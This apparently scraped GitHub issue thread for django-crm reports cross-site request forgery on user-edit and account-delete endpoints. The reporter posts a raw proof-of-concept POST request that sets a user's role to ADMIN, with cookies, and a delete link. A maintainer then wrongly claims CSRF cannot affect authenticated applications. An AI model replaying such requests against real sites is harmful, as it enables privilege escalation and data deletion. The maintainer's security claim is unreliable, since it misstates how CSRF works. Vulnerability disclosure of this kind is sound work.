Comments (6)
User Edit Form has CSRF
Expoit Request:
POST /users/25/edit/ HTTP/1.1
Host: django-crm.micropyramid.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://django-crm.micropyramid.com/users/25/edit/
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
Cookie: csrftoken=zTfdp0GE2eqwRNnPNqfBX4seYXdFq8j8JtyzmYtaLWu3waAFjyfa7umOscWkO1iQ; sessionid=kta9sxfstfmi6mi2r4vankx5h1zuvvic
Connection: close
Upgrade-Insecure-Requests: 1
first_name=Adam&last_name=Chan&username=adamchan&email=test%40test.com&role=ADMIN
from django-crm.
CSRF while delete account
Exploit link https://django-crm.micropyramid.com/accounts/123/delete/
from django-crm.
there is no use if csrf token present in cookie
from django-crm.
csrf token should be present in form or custom header as well as validate that csrf token on server side before save the forms or delete something.
from django-crm.
Reference : https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)
from django-crm.
@abuvanth thanks for your observation and there is no chance of CSRF for auth protected applications. CSRF is for something like contact forms which doesn't not need to get authenticated to access.
Read "Am I Vulnerable To 'Cross-Site Request Forgery (CSRF)'?" section in the OWASP link provided by you.
There are very simple scripts we can execute in terminal to get CSRF token and send it back in no time.
Anyway, we will review and add o remove it completely to eliminate these confusions about security.
Thank you.
from django-crm.
Related Issues (20)
- Not Found: /api/v4/templates/menu_main/ HOT 1
- No static folder HOT 1
- use weasyprint instead of pdfkit
- Not able to find page to login HOT 5
- Registration
- Error: [Errno 13] Permission denied: '/home/venv'
- ValueError: Field 'id' expected a number but got 'null'. HOT 1
- Key Error : 'Secret Key' HOT 3
- Micropyramid CRM HOT 1
- Unable to start celery tasks HOT 1
- Still Active HOT 4
- not able to start the react CRM HOT 1
- AttributeError: 'Request' object has no attribute 'profile' HOT 1
- Cannot Register new user HOT 2
- leads cant get data
- Can't create superuser HOT 4
- Not able to create or modify Leads
- how i start HOT 2
- Run the Djrango-CRM on windows using virtual environment HOT 3
- Dockerize services for local dev work
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from django-crm.